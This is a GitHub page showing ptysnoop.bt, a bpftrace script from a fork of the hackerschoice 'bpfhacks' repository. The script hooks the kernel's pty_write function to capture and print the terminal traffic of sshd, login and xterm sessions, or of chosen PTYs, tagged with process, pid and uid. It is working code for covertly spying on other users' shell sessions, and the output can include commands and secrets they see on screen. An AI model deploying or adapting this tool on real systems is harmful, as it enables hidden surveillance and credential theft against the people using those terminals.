forked from hackerschoice/bpfhacks
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathptysnoop.bt
executable file
·124 lines (109 loc) · 3.99 KB
/
ptysnoop.bt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
#! /usr/bin/env bpftrace
/*
* bpftrace -B none ./ptysnoop.bt [PTY number]...
*
* Example 1 - Snoop on sshd, login and xterms:
* BPFTRACE_STRLEN=200 bpftrace -Bnone ./ptysnoop.bt
*
* Example 1 - Snoop on /dev/pty/0, ... /dev/pty/3:
* bpfrace -Bnone 0 1 2 3
*
* FAQ:
* 1. Download the latest bpftrace static binary for Linux:
* curl -o bpftrace -fL https://github.com/iovisor/bpftrace/releases/latest/download/bpftrace
*
* Limitations:
* - The buffer may contain \x0d in the middle and it wont translate to \n.
*/
BEGIN
{
@last_special = 0x0d;
if ($1 != 31336) {
printf("🦋 \x1b[0;33mTIP: Nicefy the output:\n");
printf("\x1b[0;36mbpftrace -Bnone ptysnoop.bt 31336 | sed -Eu -e 's/\\\\x0a\\\\x0d|\\\\x0d/\\n| /g' -e 's/\\\\x1b\\[[0-9;><]*[a-zA-Z~]|\\\\x1bO[ABCD]//g' -e 's/(\\\\x[0-9a-f]{2})+//g' -e 's/(\\\\[dt])+/\\1/g'\x1b[0m\n");
printf("-----\n");
}
if ($# == 0) { return; }
if ($# == 1 && $1 == 31336) { return; }
@is_tty_snoop = 1;
if ($# >= 1 && $1 != 31336) { @all_tty[$1] = 1; }
if ($# >= 2) { @all_tty[$2] = 1; }
if ($# >= 3) { @all_tty[$3] = 1; }
if ($# >= 4) { @all_tty[$4] = 1; }
if ($# >= 5) { @all_tty[$5] = 1; }
if ($# >= 6) { @all_tty[$6] = 1; }
if ($# >= 7) { @all_tty[$7] = 1; }
if ($# >= 8) { @all_tty[$8] = 1; }
if ($# >= 9) { @all_tty[$9] = 1; }
if ($# >= 10) { @all_tty[$10] = 1; }
if ($# >= 11) { @all_tty[$11] = 1; }
if ($# >= 12) { @all_tty[$12] = 1; }
}
END
{
if ($1 != 31336) {
printf("\n😘 \x1b[0;33mYou may want to nicefy a log like so:\n");
printf("\x1b[0;36mcat x.log | sed -E -e 's/\\\\x0a\\\\x0d|\\\\x0d/\\n| /g' -e 's/\\x1b\\[[0-9;]*m|\\\\x1b\\[[0-9;><]*[a-zA-Z~]|\\\\x1bO[ABCD]//g' -e 's/(\\\\x[0-9a-f]{2})+//g' -e 's/(\\\\[dt])+/\\1/g'");
}
printf("\x1b[0m\n-----\n\x1b[1;37mJoin us on Telegram - https://t.me/thcorg\x1b[0m");
delete(@last_special);
delete(@last_id);
delete(@is_tty_snoop);
delete(@color);
clear(@all_tty);
}
kfunc:pty_write
/args->tty->count == 1/ // only master TTY
{
if (@is_tty_snoop > 0) {
if (@all_tty[args->tty->index] == 0) { return; }
} else {
if (comm == "sshd") { $hit = 1; }
if ($hit == 0 && strcontains(comm, "term") == 1) { $hit = 1; }
if ($hit == 0 && comm == "login") { $hit = 1; }
if ($hit == 0) { return; }
}
$b = args->buf;
$len = args->c;
$last_id = @last_id;
$this_id = (uint64)args->tty;
// Do not output Arrow-UP/DOWN
if ($len == 3 && $b[0] == 0x1b) { return; }
$special = -1;
if ($len == 1) {
// Special character. Only output ONCE
if ($b[0] < 0x20 || $b[0] > 0x7e) {
$special = $b[0];
}
}
if ($last_id != $this_id) {
// PID has changed
// Don't output if the user just presses enter or other special single input.
if ($special >= 0) { return; }
// Go to new line unless we are already on a new line.
if (@last_special != 0x0d) { printf("\n"); }
@color = (uint64)args->tty->index % 6 + 1;
printf("\x1b[0m>>>> \x1b[0;33m%s\x1b[0m %d /dev/pty/%d (uid=%d):\n\x1b[0;3%dm", comm, pid, args->tty->index, uid, @color);
// Record a successful switch to new prompt
@last_id = $this_id;
@last_special = 0x0d;
}
if ($special >= 0) {
// Only output special characters ONCE.
if (@last_special == $special) { return; }
// Never output if at the beginning of a new line
if (@last_special == 0x0d) { return; }
if ($special == 0x08 || $special == 0x7f) {
printf("\x1b[0;2m\\d\x1b[0;3%dm", @color); // DEL
} else if ($special == 0x09) {
printf("\x1b[0;2m\\t\x1b[0;3%dm", @color); // TAB
} else if ($special == 0x0d) {
printf("\n");
}
@last_special = $special;
return;
}
if (@last_special == 0x0d) { printf("| "); }
@last_special = -1;
printf("%r", buf($b, $len));
}